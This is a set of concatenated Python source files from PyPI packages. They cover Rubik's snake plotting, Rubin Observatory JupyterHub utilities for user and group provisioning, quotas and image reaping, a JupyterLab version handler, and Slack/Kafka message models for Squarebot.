elif np.isclose(interference_type, 1.5): # small prism cos_nn = 1.5
p0i, p1i, p2i, p3i, p4i, p5i = self.conformation[i]
ridge_i = p3i - p2i, p2i - p3i
vert_ax_i = p3i - p5i
horns_j = get_horns(self.conformation[j])
for n, m in product((0, 1), (0, 1)):
if np.isclose(cosine(ridge_i[n], horns_j[m]), 0):
break
m = (m + 1) % 2
cos_dist = cosine(vert_ax_i, horns_j[m])
if n == 0:
if np.isclose(cos_dist, 1):
p0, p1, p2, p3 = p1i, p3i, p5i, p0i
elif np.isclose(cos_dist, 2):
p0, p1, p2, p3 = p1i, p3i, p5i, p4i
else:
raise Exception
else:
if np.isclose(cos_dist, 1):
p0, p1, p2, p3 = p0i, p2i, p4i, p1i
elif np.isclose(cos_dist, 2):
p0, p1, p2, p3 = p0i, p2i, p4i, p5i
else:
raise Exception
intersection = np.vstack((p0, p1, p2, p3))
unit_triangles = np.array([
[0, 1, 2],
[0, 1, 3],
[1, 2, 3],
[0, 2, 3],
], dtype=np.uint16)
edge_bypass = [0, 1, 2, 0, 3, 1, 2, 3]
edges = intersection[edge_bypass]
elif np.isclose(interference_type, 2.0): # no intersection cos_nn = 2
return None, None, None
else:
raise Exception
return intersection, unit_triangles, edges
def get_edges(self):
edge_bypass = [0, 1, 3, 2, 0, 4, 5, 1, 3, 5, 4, 2]
edges = [unit[edge_bypass].T for unit in self.conformation]
return edges
def get_triangle_colors(self):
colors = np.tile(self.colors, (self.TRIANGLES_PER_UNIT,1)).T.flatten()
cap_colors = [self.colors[0]]*2 + [self.colors[-1]]*2
return np.hstack((colors, cap_colors))
def get_plot_ranges(self):
DELTA = 0.2
coords = self.conformation.reshape(-1,3)
min_c = coords.min(axis=0)
max_c = coords.max(axis=0)
mean_c = (max_c + min_c) / 2
max_range = (max_c - min_c).max() + DELTA
lower_bounds = mean_c - max_range/2
upper_bounds = mean_c + max_range/2
return np.vstack((lower_bounds, upper_bounds)).T
def plot_3d(self, figsize=(800, 800),
allow_self_intersection=True,
visualize_interferences=True,
background_color='LightSteelBlue'):
if not allow_self_intersection and self.interferences:
return
import plotly.graph_objects as go
coordinates, triangles = self.get_triangulation()
x, y, z = coordinates.T
i, j, k = triangles.T
mesh3d = go.Mesh3d(
x=x, y=y, z=z,
i=i, j=j, k=k,
colorscale=self.color_scale,
intensity=self.get_triangle_colors(),
intensitymode='cell',
opacity=1 if not self.interferences else 0.5,
showscale=False,
)
mesh3d_intersections = []
if visualize_interferences:
for units in self.interferences:
for i, j in combinations(units, 2):
coordinates, triangles, edges = self.get_intersecting_volume(i, j)
if coordinates is None:
continue
x, y, z = coordinates.T
i, j, k = triangles.T
mesh3d_intersections.append(go.Mesh3d(
x=x, y=y, z=z,
i=i, j=j, k=k,
color='lightpink',
opacity=0.9,
))
x, y, z = edges.T
mesh3d_intersections.append(go.Scatter3d(
x=x, y=y, z=z,
mode='lines',
name='',
line=dict(color='red', width=8),
))
lines = [go.Scatter3d(
x=x, y=y, z=z,
mode='lines',
name='',
line=dict(color='black', width=8),
) for x, y, z in self.get_edges()]
fig = go.Figure(data=[mesh3d] + lines + mesh3d_intersections)
x_range, y_range, z_range = self.get_plot_ranges()
width, height = figsize
fig.update_layout(
autosize=False,
width=width,
height=height,
margin=dict(
l=0,
r=0,
b=0,
t=0,
),
scene = dict(
xaxis = dict(visible=False, range=x_range),
yaxis = dict(visible=False, range=y_range),
zaxis = dict(visible=False, range=z_range),
),
showlegend=False,
scene_aspectmode='cube',
paper_bgcolor=background_color,
)
fig.show(config={'displaylogo': False}) | /rubiks_snake-0.1.3.tar.gz/rubiks_snake-0.1.3/rubiks_snake.py | 0.490968 | 0.397938 | rubiks_snake.py | pypi |
import hashlib
from collections import defaultdict
def rreplace(s, old, new, occurrence):
"""Convenience function from:
https://stackoverflow.com/questions/2556108/\
rreplace-how-to-replace-the-last-occurrence-of-an-expression-in-a-string
"""
li = s.rsplit(old, occurrence)
return new.join(li)
def str_bool(s):
"""Make a sane guess for whether a value represents true or false.
Intended for strings, mostly in the context of environment variables,
but if you pass it something that's not a string that is falsy, like
an empty list, it will cheerfully return False.
"""
if not s:
return False
if type(s) != str:
# It's not a string and it's not falsy, soooo....
return True
s = s.lower()
if s in ["false", "0", "no", "n"]:
return False
return True
def str_true(v):
"""The string representation of a true value will be 'TRUE'. False will
be the empty string.
"""
if v:
return "TRUE"
else:
return ""
def listify(item, delimiter=","):
"""Used for taking character (usually comma)-separated string lists
and returning an actual list, or the empty list.
Useful for environment parsing.
Sure, you could pass it integer zero and get [] back. Don't.
"""
if not item:
return []
if type(item) is str:
item = item.split(delimiter)
if type(item) is not list:
raise TypeError("'listify' must take None, str, or list!")
return item
def floatify(item, default=0.0):
"""Another environment-parser: the empty string should be treated as
None, and return the default, rather than the empty string (which
does not become an integer). Default can be either a float or string
that float() works on. Note that numeric zero (or string '0') returns
0.0, not the default. This is intentional.
"""
if item is None:
return default
if item == "":
return default
return float(item)
def intify(item, default=0):
"""floatify, but for ints."""
return int(floatify(item, default))
def list_duplicates(seq):
"""List duplicate items from a sequence."""
# https://stackoverflow.com/questions/5419204
tally = defaultdict(list)
for i, item in enumerate(seq):
tally[item].append(i)
return ((key, locs) for key, locs in tally.items() if len(locs) > 1)
def list_digest(inp_list):
"""Return a digest to uniquely identify a list."""
if type(inp_list) is not list:
raise TypeError("list_digest only works on lists!")
if not inp_list:
raise ValueError("input must be a non-empty list!")
# If we can rely on python >= 3.8, shlex.join is better
return hashlib.sha256(" ".join(inp_list).encode("utf-8")).hexdigest() | /rubin_jupyter_utils.helpers-0.33.0.tar.gz/rubin_jupyter_utils.helpers-0.33.0/rubin_jupyter_utils/helpers/typehelpers.py | 0.619011 | 0.321008 | typehelpers.py | pypi |
import hashlib
def get_fake_gid(grpname):
"""Use if we have strict_ldap_groups off, to assign GIDs to names
with no matching Unix GID. We would like them to be consistent, so
we will use a hash of the group name, modulo some large-ish constant,
added to another large-ish constant.
There is a chance of collision, but it doesn't really matter.
We do need to keep the no-GID groups around, though, because we might
be using them to make options form or quota decisions (if we know we
don't, we should turn on strict_ldap_groups).
"""
grpbase = 3e7
grprange = 1e7
grphash = hashlib.sha256(grpname.encode("utf-8")).hexdigest()
grpint = int(grphash, 16)
igrp = int(grpbase + (grpint % grprange))
return igrp
def make_passwd_line(claims):
"""Create an entry for /etc/passwd based on our claims. Returns a
newline-terminated string.
"""
uname = claims["uid"]
uid = claims["uidNumber"]
pwline = "{}:x:{}:{}::/home/{}:/bin/bash\n".format(uname, uid, uid, uname)
return pwline
def assemble_gids(claims, strict_ldap=False):
"""Take the claims data and return the string to be used for be used
for provisioning the user and groups (in sudo mode).
"""
glist = _map_supplemental_gids(claims, strict_ldap=strict_ldap)
gidlist = ["{}:{}".format(x[0], x[1]) for x in glist]
return ",".join(gidlist)
def make_group_lines(claims, strict_ldap=False):
"""Create a list of newline-terminated strings representing group
entries suitable for appending to /etc/group.
"""
uname = claims["uid"]
uid = claims["uidNumber"]
# Add individual group; don't put user in it (implicit from group in
# passwd)
glines = ["{}:x:{}:\n".format(uname, uid)]
glist = _map_supplemental_gids(claims, strict_ldap=strict_ldap)
glines.extend(["{}:x:{}:{}\n".format(x[0], x[1], uname) for x in glist])
return glines
def get_supplemental_gids(claims, strict_ldap=False):
"""Create a list of gids suitable to paste into the supplemental_gids
the container can run with (in sudoless mode)."""
glist = _map_supplemental_gids(claims, strict_ldap=strict_ldap)
return [x[1] for x in glist]
def resolve_groups(claims, strict_ldap=False):
"""Returns groupmap suitable for insertion into auth_state;
group values are strings.
"""
glist = _map_supplemental_gids(claims, strict_ldap=strict_ldap)
groupmap = {}
for gt in glist:
groupmap[gt[0]] = str(gt[1])
return groupmap
def _map_supplemental_gids(claims, strict_ldap=False):
"""Helper function to deal with group manipulation. Returns a list of
tuples (groupname, gid).
If a name has no id, omit the entry if strict_ldap is True. Otherwise
generate a fake gid for it and use that.
"""
uname = claims["uid"]
groups = claims["isMemberOf"]
retval = []
for grp in groups:
gname = grp["name"]
if gname == uname:
continue # We already have private group as runAsGid
gid = grp.get("id", None)
if not gid:
if not strict_ldap:
gid = get_fake_gid(gname)
if gid:
retval.append((gname, gid))
return retval
def add_user_to_groups(uname, grpstr, groups=["lsst_lcl", "jovyan"]):
"""Take a user name (a string) and a base group file (as a string) and
inject the user into the appropriate groups, given in the groups
parameter (defaults to 'lsst_lcl' and 'jovyan'). Returns a string."""
glines = grpstr.split("\n")
g_str = ""
for grp in glines:
s_line = grp.strip()
if not s_line:
continue
grpname = s_line.split(":")[0]
if grpname in groups:
if s_line.endswith(":"):
s_line = s_line + uname
else:
s_line = s_line + "," + uname
g_str = g_str + s_line + "\n"
return g_str | /rubin_jupyter_utils.helpers-0.33.0.tar.gz/rubin_jupyter_utils.helpers-0.33.0/rubin_jupyter_utils/helpers/groups.py | 0.535584 | 0.388038 | groups.py | pypi |
import asyncio # noqa: F401 (We do indeed use an async def)
import json
from eliot import start_action
from jupyterhub.auth import Authenticator
from .. import RubinMiddleManager
from rubin_jupyter_utils.config import RubinConfig
class RubinAuthenticator(Authenticator):
"""We create a Rubin Manager structure on startup; this is a
RubinMiddleManager controlling a set of other managers: auth, env,
namespace, quota, and volume.
All RubinAuthenticator subclasses are expected to create two new fields in
auth_state:
* auth_state['group_map'], which contains a dict mapping group name
(the key) to a group ID number (the value). GIDs may be strings or
integers.
* auth_state['uid'], which contains a string or an integer with the
user's numeric UID.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.rubin_mgr = RubinMiddleManager(
parent=self, authenticator=self, config=RubinConfig()
)
self.enable_auth_state = True
self.delete_invalid_users = True
self.token = None
def dump(self):
"""Return dict suitable for pretty-printing."""
ad = {
"enable_auth_state": self.enable_auth_state,
"delete_invalid_users": self.delete_invalid_users,
"login_handler": str(self.login_handler),
"rubin_mgr": self.rubin_mgr.dump(),
}
return ad
def toJSON(self):
return json.dumps(self.dump())
async def refresh_user(self, user, handler=None):
"""On each refresh_user, clear the options form cache, thus
forcing it to be rebuilt on next display. Otherwise it is built once
per user session, which is not frequent enough to display new images
in a timely fashion.
"""
with start_action(action_type="refresh_user_rubinauth"):
uname = user.escaped_name
self.log.debug(
"Entering Rubin auth refresh_user for '{}'.".format(uname)
)
self.log.debug("Calling superclass's refresh_user().")
retval = await super().refresh_user(user, handler)
self.log.debug("Returned from superclass's refresh_user().")
self.log.debug("Clearing form data for '{}'.".format(uname))
self.rubin_mgr.optionsform_mgr.options_form_data = None
self.log.debug(
"Finished Rubin auth refresh_user for '{}'".format(uname)
)
return retval | /rubin_jupyter_utils.hub-0.38.0.tar.gz/rubin_jupyter_utils.hub-0.38.0/rubin_jupyter_utils/hub/authenticator/rubinauthenticator.py | 0.595493 | 0.276904 | rubinauthenticator.py | pypi |
import json
import os
from eliot import start_action
from kubernetes.client import V1ResourceQuotaSpec
from kubernetes.client.rest import ApiException
from kubernetes import client
from .. import LoggableChild
class RubinQuotaManager(LoggableChild):
"""Quota support for Rubin LSP Jupyterlab and Dask pods."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.quota = {}
self.custom_resources = {}
self.resourcemap = None
def define_resource_quota_spec(self):
"""We're going to return a resource quota spec that checks whether we
have a custom resource map and uses that information. If we do not
then we use the quota from our parent's config object.
Note that you could get a lot fancier, and check the user group
memberships to determine what class a user belonged to, or some other
more-sophisticated-than-one-size-fits-all quota mechanism.
"""
with start_action(action_type="define_resource_quota_spec"):
self.log.debug("Calculating default resource quotas.")
om = self.parent.optionsform_mgr
sizemap = om.sizemap
# sizemap is an ordered dict, and we want the last-inserted one,
# which is the biggest
big = list(sizemap.keys())[-1]
cpu = sizemap[big]["cpu"]
cfg = self.parent.config
max_dask_workers = 0
if cfg.allow_dask_spawn:
max_dask_workers = cfg.max_dask_workers
mem_per_cpu = cfg.mb_per_cpu
total_cpu = (1 + max_dask_workers) * cpu
total_mem = str(int(total_cpu * mem_per_cpu + 0.5)) + "Mi"
total_cpu = str(int(total_cpu + 0.5))
self.log.debug(
"Default quota sizes: CPU %r, mem %r" % (total_cpu, total_mem)
)
self._set_custom_user_resources()
if self.custom_resources:
self.log.debug("Have custom resources.")
cpuq = self.custom_resources.get("cpu_quota")
if cpuq:
self.log.debug("Overriding CPU quota.")
total_cpu = str(cpuq)
memq = self.custom_resources.get("mem_quota")
if memq:
self.log.debug("Overriding memory quota.")
total_mem = str(memq) + "Mi"
self.log.debug(
"Determined quota sizes: CPU %r, mem %r"
% (total_cpu, total_mem)
)
qs = V1ResourceQuotaSpec(
hard={"limits.cpu": total_cpu, "limits.memory": total_mem}
)
self.quota = qs.hard
def _set_custom_user_resources(self):
"""Create custom resource definitions for user."""
with start_action(action_type="_set_custom_user_resources"):
if not self.resourcemap:
self.log.debug("No resource map found; generating.")
self._create_resource_map()
if not self.resourcemap:
self.log.warning("No resource map; cannot generate quota.")
return
resources = {"size_index": 0, "cpu_quota": 0, "mem_quota": 0}
gnames = self.parent.user.groups
uname = self.parent.user.escaped_name
for resdef in self.resourcemap:
apply = False
if resdef.get("disabled"):
continue
candidate = resdef.get("resources")
if not candidate:
continue
self.log.debug(
"Considering candidate resource map {}".format(resdef)
)
ruser = resdef.get("user")
rgroup = resdef.get("group")
if ruser and ruser == uname:
self.log.debug("User resource map match.")
apply = True
if rgroup and rgroup in gnames:
self.log.debug("Group resource map match.")
apply = True
if apply:
for fld in ["size_index", "cpu_quota", "mem_quota"]:
vv = candidate.get(fld)
if vv and vv > resources[fld]:
resources[fld] = vv
self.log.debug(
"Setting custom resources '{}'".format(resources)
+ "for user '{}'".format(uname)
)
self.custom_resources = resources
def _create_resource_map(self):
with start_action(action_type="_create_resource_map"):
resource_file = self.parent.config.resource_map
if not os.path.exists(resource_file):
nf_msg = (
"Could not find resource definition file"
+ " at '{}'".format(resource_file)
)
self.log.error(nf_msg)
return
with open(resource_file, "r") as rf:
resmap = json.load(rf)
self.resourcemap = resmap
# Brought in from namespacedkubespawner
def ensure_namespaced_resource_quota(self, quotaspec):
"""Create K8s quota object if necessary."""
with start_action(action_type="ensure_namespaced_resource_quota"):
self.log.debug("Entering ensure_namespaced_resource_quota()")
namespace = self.parent.namespace_mgr.namespace
api = self.parent.api
if namespace == "default":
self.log.error("Will not create quota for default namespace!")
return
quota = client.V1ResourceQuota(
metadata=client.V1ObjectMeta(
name="quota",
),
spec=quotaspec,
)
self.log.info("Creating quota: %r" % quota)
try:
api.create_namespaced_resource_quota(namespace, quota)
except ApiException as e:
if e.status != 409:
self.log.exception(
"Create resourcequota '%s'" % quota
+ "in namespace '%s' " % namespace
+ "failed: %s",
str(e),
)
raise
else:
self.log.debug(
"Resourcequota '%r' " % quota
+ "already exists in '%s'." % namespace
)
def destroy_namespaced_resource_quota(self):
"""Destroys the Kubernetes namespaced resource quota.
You don't usually have to call this, since it will get
cleaned up as part of namespace deletion.
"""
with start_action(action_type="destroy_namespaced_resource_quota"):
namespace = self.parent.namespace_mgr.namespace
api = self.parent.api
qname = "quota-" + namespace
dopts = client.V1DeleteOptions()
self.log.info("Deleting resourcequota '%s'" % qname)
api.delete_namespaced_resource_quota(qname, namespace, dopts)
def dump(self):
"""Return contents dict for pretty-printing/aggregation."""
qd = {
"parent": str(self.parent),
"quota": self.quota,
"custom_resources": self.custom_resources,
"resourcemap": self.resourcemap,
}
return qd
def toJSON(self):
return json.dumps(self.dump()) | /rubin_jupyter_utils.hub-0.38.0.tar.gz/rubin_jupyter_utils.hub-0.38.0/rubin_jupyter_utils/hub/rubinmgr/quotamanager.py | 0.502197 | 0.169337 | quotamanager.py | pypi |
import json
from .. import Loggable
from .apimanager import RubinAPIManager
from .envmanager import RubinEnvironmentManager
from .namespacemanager import RubinNamespaceManager
from .optionsformmanager import RubinOptionsFormManager
from .quotamanager import RubinQuotaManager
from .volumemanager import RubinVolumeManager
class RubinMiddleManager(Loggable):
"""The RubinMiddleManager is a class that holds references to various
Rubin-specific management objects and delegates requests to them.
The idea is that an Rubin Spawner could instantiate a single
RubinMiddleManager, which would then be empowered to perform all
Rubin-specific operations, reducing configuration complexity.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.config = kwargs.pop("config", None)
self.parent = kwargs.pop("parent", None)
self.log.info(
"Parent of Rubin Middle Manager is '{}'".format(self.parent)
)
self.authenticator = kwargs.pop("authenticator", None)
self.spawner = kwargs.pop("spawner", None)
self.user = kwargs.pop("user", None)
self.api_mgr = RubinAPIManager(parent=self)
self.env_mgr = RubinEnvironmentManager(parent=self)
self.namespace_mgr = RubinNamespaceManager(parent=self)
self.optionsform_mgr = RubinOptionsFormManager(parent=self)
self.quota_mgr = RubinQuotaManager(parent=self)
self.volume_mgr = RubinVolumeManager(parent=self)
self.api = self.api_mgr.api
self.rbac_api = self.api_mgr.rbac_api
def dump(self):
"""Return contents dict to pretty-print."""
md = {
"parent": str(self.parent),
"authenticator": str(self.authenticator),
"api": str(self.api),
"rbac_api": str(self.rbac_api),
"config": self.config.dump(),
"api_mgr": self.api_mgr.dump(),
"env_mgr": self.env_mgr.dump(),
"optionsform_mgr": self.optionsform_mgr.dump(),
"quota_mgr": self.quota_mgr.dump(),
"volume_mgr": self.volume_mgr.dump(),
}
if self.user:
md["user"] = "{}".format(self.user)
if self.spawner:
md["spawner"] = self.spawner.dump()
return md
def toJSON(self):
return json.dumps(self.dump()) | /rubin_jupyter_utils.hub-0.38.0.tar.gz/rubin_jupyter_utils.hub-0.38.0/rubin_jupyter_utils/hub/rubinmgr/middlemanager.py | 0.59843 | 0.158891 | middlemanager.py | pypi |
import os
import requests
from eliot import start_action
from . import SingletonScanner
class Reaper(SingletonScanner):
"""Class to allow implementation of image retention policy."""
# We don't need to categorize releases since we never delete any of
# them.
def __init__(self, *args, **kwargs):
self.keep_experimentals = kwargs.pop("keep_experimentals", 10)
self.keep_dailies = kwargs.pop("keep_dailies", 15)
self.keep_weeklies = kwargs.pop("keep_weeklies", 78)
self.dry_run = kwargs.pop("dry_run", False)
self.more_cowbell = self.reap
super().__init__(**kwargs)
self.logger.debug(
(
"Keeping: {} weeklies, {} dailies, and {} " + "experimentals."
).format(
self.keep_weeklies, self.keep_dailies, self.keep_experimentals
)
)
self.delete_tags = False
if self.registry_url.startswith("registry.hub.docker.com"):
self.delete_tags = True
self.reapable = {}
self._categorized_tags = {}
def _categorize_tags(self):
self._categorized_tags = {
"weekly": [],
"daily": [],
"experimental": [],
}
with start_action(action_type="_categorize_tags"):
self.scan_if_needed()
rresults = self._reduced_results # already sorted
for res in rresults:
rt = res["type"]
if rt in ["weekly", "daily", "experimental"]:
self.logger.debug("Found image {}".format(res))
self._categorized_tags[rt].append(res["name"])
_, old_prereleases = self._prune_releases()
self._categorized_tags["obsolete_prereleases"] = [
x["name"] for x in old_prereleases
]
def _select_victims(self):
with start_action(action_type="_select victims"):
self._categorize_tags()
reaptags = []
sc = self._categorized_tags
reaptags.extend(sc["experimental"][self.keep_experimentals :])
reaptags.extend(sc["daily"][self.keep_dailies :])
reaptags.extend(sc["weekly"][self.keep_weeklies :])
reaptags.extend(sc["obsolete_prereleases"])
reapable = {}
for r in reaptags:
reapable[r] = self._results_map[r]["hash"]
self.logger.debug("Images to reap: {}.".format(reapable))
self.reapable = reapable
def report_reapable(self):
"""Return a space-separated list of reapable images."""
with start_action(action_type="report_reapable"):
self._select_victims()
return " ".join(self.reapable.keys())
def reap(self):
"""Select and delete images."""
with start_action(action_type="reap"):
self._select_victims()
self._delete_from_repo()
def _delete_from_repo(self):
with start_action(action_type="_delete_from_repo"):
tags = list(self.reapable.keys())
if not tags:
self.logger.info("No images to reap.")
return
if self.dry_run:
self.logger.info("Dry run: images to reap: {}".format(tags))
return
headers = {
"Accept": (
"application/vnd.docker.distribution.manifest." + "v2+json"
)
}
sc = 0
if self.registry_url.startswith("https://registry.hub.docker.com"):
self._delete_tags_from_docker_hub()
return
for t in tags:
self.logger.debug("Attempting to reap '{}'.".format(t))
h = self.reapable[t]
path = self.registry_url + "manifests/" + h
resp = requests.delete(path, headers=headers)
sc = resp.status_code
if sc == 401:
auth_hdr = self._authenticate_to_repo(resp)
headers.update(auth_hdr) # Retry with new auth
self.logger.warning("Retrying with new authentication.")
resp = requests.delete(path, headers=headers)
sc = resp.status_code
if (sc >= 200) and (sc < 300):
# Got it.
del self._results_map[t]
else:
self.logger.warning("DELETE {} => {}".format(path, sc))
self.logger.warning("Headers: {}".format(resp.headers))
self.logger.warning("Body: {}".format(resp.text))
if self.cachefile:
self._writecachefile() # Remove deleted tags
def _delete_tags_from_docker_hub(self):
# This is, of course, completely different from the published API
# https://github.com/docker/hub-feedback/issues/496
with start_action(action_type="_delete_tags_from_docker_hub"):
self.logger.info("Deleting tags from Docker Hub.")
r_user = self.config.reaper_user
r_pw = self.config.reaper_password
data = {"username": r_user, "password": r_pw}
headers = {
"Content-Type": "application/json",
"Accept": "application/json",
}
token = None
# Exchange username/pw for token
if r_user and r_pw:
resp = requests.post(
"https://hub.docker.com/v2/users/login",
headers=headers,
json=data,
)
r_json = resp.json()
if r_json:
token = r_json.get("token")
else:
self.logger.warning("Failed to authenticate:")
self.logger.warning("Headers: {}".format(resp.headers))
self.logger.warning("Body: {}".format(resp.text))
else:
self.logger.error("Did not have username and password.")
if not token:
self.logger.error("Could not acquire JWT token.")
return
headers["Authorization"] = "JWT {}".format(token)
tags = list(self.reapable.keys())
for t in tags:
path = (
"https://hub.docker.com/v2/repositories/"
+ self.owner
+ "/"
+ self.name
+ "/tags/"
+ t
+ "/"
)
self.logger.info("Deleting tag '{}'".format(t))
resp = requests.delete(path, headers=headers)
sc = resp.status_code
if (sc < 200) or (sc >= 300):
self.logger.warning("DELETE {} => {}".format(path, sc))
self.logger.warning("Headers: {}".format(resp.headers))
self.logger.warning("Body: {}".format(resp.text))
if sc != 404:
continue
# It's already gone, so remove from map!
del self._results_map[t]
if self.cachefile:
self._writecachefile() # Remove deleted tags | /rubin_jupyter_utils.hub-0.38.0.tar.gz/rubin_jupyter_utils.hub-0.38.0/rubin_jupyter_utils/hub/scanrepo/reaper.py | 0.544317 | 0.176565 | reaper.py | pypi |
import json
import os
from notebook.utils import url_path_join as ujoin
from notebook.base.handlers import APIHandler
def _label_from_fields(version_config):
# Parse the image ref into fields we want to display; do the work
# here and return an object with computed fields to our caller so
# the UI side can be very dumb.
# Start with the fields that came in from the Lab container context
# Get rid of host/owner if any in image reference
display_desc = version_config["image_description"]
display_name = version_config["jupyter_image"].split("/")[-1]
display_hash = version_config["image_digest"]
# If we have a description, put parens around the image name; if we don't,
# use the image name as our main text, since description is empty.
if display_desc != "":
display_name = f" ({display_name})"
# If we have a digest, format it for display (remove algorithm and
# truncate to 8 characters, then add an ellipsis and put the whole thing
# in square brackets).
if display_hash != "":
trunc_hash = (display_hash.split(":")[-1])[:8]
display_hash = f" [ {trunc_hash}... ] "
# Then just concatenate them all together
label=f"{display_desc}{display_name}{display_hash}"
return label
class DisplayVersion_handler(APIHandler):
"""
DisplayVersion Handler. Return the JSON representation of our
Lab version information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.version_config={}
for i in ["JUPYTER_IMAGE", "IMAGE_DESCRIPTION", "IMAGE_DIGEST"]:
self.version_config[i.lower()] = self._files_then_env(i)
self.version_config["label"] = _label_from_fields(
self.version_config)
def get(self):
"""
"""
self.log.info("Sending Display Version settings")
self.finish(json.dumps(self.version_config))
def _files_then_env(self, symbol):
"""Try to extract a symbol. First use the path at which it should be
mounted into the container. If that doesn't exist or isn't
readable, try the environment variable of the same name. If
neither of those works, return the empty string.
"""
basedir = "/opt/lsst/software/jupyterlab/environment"
val = ""
try:
fn = os.path.join(basedir, symbol)
with open(fn, "r") as f:
val = f.read()
except Exception as e:
self.log.warning(f"Could not read from {fn}: {e}; trying env var.")
val = os.getenv(symbol, "")
return val
def setup_handlers(web_app):
"""
Function used to setup all the handlers used.
"""
# add the baseurl to our paths
host_pattern = ".*$"
base_url = web_app.settings["base_url"]
handlers = [(ujoin(base_url, r"/rubin/display_version"),
DisplayVersion_handler)]
web_app.add_handlers(host_pattern, handlers) | /rubin_jupyter_utils.lab-0.13.0.tar.gz/rubin_jupyter_utils.lab-0.13.0/rubin_jupyter_utils/lab/serverextensions/display_version/handlers.py | 0.488039 | 0.225715 | handlers.py | pypi |
from __future__ import annotations
import json
from typing import Any, Self
from dataclasses_avroschema.avrodantic import AvroBaseModel
from pydantic import Field
from .slack import SlackChannelType, SlackMessageEvent, SlackMessageType
__all__ = [
"SquarebotSlackMessageKey",
"SquarebotSlackMessageValue",
"SquarebotSlackAppMentionValue",
]
class SquarebotSlackMessageKey(AvroBaseModel):
"""Kafka message key model for Slack messages sent by Squarebot."""
channel: str = Field(..., description="The Slack channel ID.")
class Meta:
"""Metadata for the model."""
namespace = "lsst.square-events.squarebot.messages"
schema_name = "key"
@classmethod
def from_event(cls, event: SlackMessageEvent) -> Self:
"""Create a Kafka key for a Slack message from a Slack event.
Parameters
----------
event
The Slack event.
Returns
-------
key
The Squarebot message key.
"""
return cls(channel=event.event.channel)
class SquarebotSlackMessageValue(AvroBaseModel):
"""Kafka message value model for Slack messages sent by Squarebot.
This value schema should be paired with `SquarebotSlackMessageKey` for
the key schema.
"""
type: SlackMessageType = Field(..., description="The Slack event type.")
channel: str = Field(..., description="The Slack channel ID.")
channel_type: SlackChannelType = Field(
..., description="The Slack channel type."
)
user: str = Field(
..., description="The ID of the user that sent the message."
)
ts: str = Field(
...,
description=(
"The Slack message timestamp. This is string-formatted to allow "
"comparison with other Slack messges which use the ``ts`` to "
"identify and reference messages."
),
)
text: str = Field(..., description="The Slack message text content.")
slack_event: str = Field(
..., description="The original Slack event JSON string."
)
class Meta:
"""Metadata for the model."""
namespace = "lsst.square-events.squarebot.messages"
schema_name = "value"
@classmethod
def from_event(cls, event: SlackMessageEvent, raw: dict[str, Any]) -> Self:
"""Create a Kafka value for a Slack message from a Slack event.
Parameters
----------
event
The Slack event.
raw
The raw Slack event JSON.
Returns
-------
value
The Squarebot message value.
"""
return cls(
type=event.event.type,
channel=event.event.channel,
channel_type=event.event.channel_type,
user=event.event.user,
ts=event.event.ts,
text=event.event.text,
slack_event=json.dumps(raw),
)
class SquarebotSlackAppMentionValue(AvroBaseModel):
"""Kafka message value model for Slack app_mention message sent by
Squarebot.
These are like `SquarebotSlackMessageValue` but lack a `channel_type`
field.
This value schema should be paired with `SquarebotSlackMessageKey` for
the key schema.
"""
type: SlackMessageType = Field(..., description="The Slack event type.")
channel: str = Field(..., description="The Slack channel ID.")
user: str = Field(
..., description="The ID of the user that sent the message."
)
ts: str = Field(
...,
description=(
"The Slack message timestamp. This is string-formatted to allow "
"comparison with other Slack messges which use the ``ts`` to "
"identify and reference messages."
),
)
text: str = Field(..., description="The Slack message text content.")
slack_event: str = Field(
..., description="The original Slack event JSON string."
)
class Meta:
"""Metadata for the model."""
namespace = "lsst.square-events.squarebot.appmention"
schema_name = "value"
@classmethod
def from_event(cls, event: SlackMessageEvent, raw: dict[str, Any]) -> Self:
"""Create a Kafka value for a Slack message from a Slack event.
Parameters
----------
event
The Slack event.
raw
The raw Slack event JSON.
Returns
-------
value
The Squarebot message value.
"""
return cls(
type=event.event.type,
channel=event.event.channel,
channel_type=event.event.channel_type,
user=event.event.user,
ts=event.event.ts,
text=event.event.text,
slack_event=json.dumps(raw),
) | /rubin_squarebot-0.7.0-py3-none-any.whl/rubinobs/square/squarebot/models/kafka.py | 0.957248 | 0.266644 | kafka.py | pypi |
from __future__ import annotations
from enum import Enum
from typing import Optional
from pydantic import BaseModel, Field
__all__ = [
"BaseSlackEvent",
"SlackUrlVerificationEvent",
"SlackMessageEvent",
"SlackMessageType",
"SlackChannelType",
"SlackMessageEventContent",
"SlackBlockAction",
"SlackUser",
"SlackTeam",
"SlackChannel",
]
class BaseSlackEvent(BaseModel):
"""A model for the minimal request payload from Slack for an event.
Any event message is gauranteed to have these fields. For specific types of
events, re-parse the request body with a specific model such as
`SlackMessageEvent`. For information about all the Slack event types, see
https://api.slack.com/events.
"""
type: str = Field(
...,
description=(
"The Slack event type in the message's outer scope; typically "
"this is ``url_verification`` or ``event_callback``."
),
)
class SlackUrlVerificationEvent(BaseSlackEvent):
"""A Slack ``url_verification`` event."""
challenge: str = Field(..., description="URL challenge content.")
class SlackMessageType(str, Enum):
app_mention = "app_mention"
message = "message"
class SlackChannelType(str, Enum):
channel = "channel" # public channel
group = "group" # private channel
im = "im" # direct message
mpim = "mpim" # multi-persion direct message
class SlackMessageEventContent(BaseModel):
"""A model for the ``event`` field inside a message event.
See https://api.slack.com/events/app_mention and
https://api.slack.com/events/message.
"""
type: SlackMessageType = Field(description="The Slack message type.")
channel: str = Field(
description=(
"ID of the channel where the message was sent "
"(e.g., C0LAN2Q65)."
)
)
channel_type: Optional[SlackChannelType] = Field(
description=(
"The type of channel (public, direct im, etc..). This is null for "
"``app_mention`` events."
)
)
user: str = Field(
description="The ID of the user that sent the message (eg U061F7AUR)."
)
text: str = Field(description="Content of the message.")
ts: str = Field(description="Timestamp of the message.")
event_ts: str = Field(description="When the event was dispatched.")
class SlackMessageEvent(BaseSlackEvent):
"""A Slack event for message events in general.
See https://api.slack.com/events/app_mention and
https://api.slack.com/events/message.
"""
team_id: str = Field(
description=(
"The unique identifier of the workspace where the event occurred."
)
)
api_app_id: str = Field(
description=(
"The unique identifier of your installed Slack application. Use "
"this to distinguish which app the event belongs to if you use "
"multiple apps with the same Request URL."
)
)
event_id: str = Field(
description=(
"A unique identifier for this specific event, globally unique "
"across all workspaces."
)
)
event_time: int = Field(
description=(
"The epoch timestamp in seconds indicating when this event was "
"dispatched."
)
)
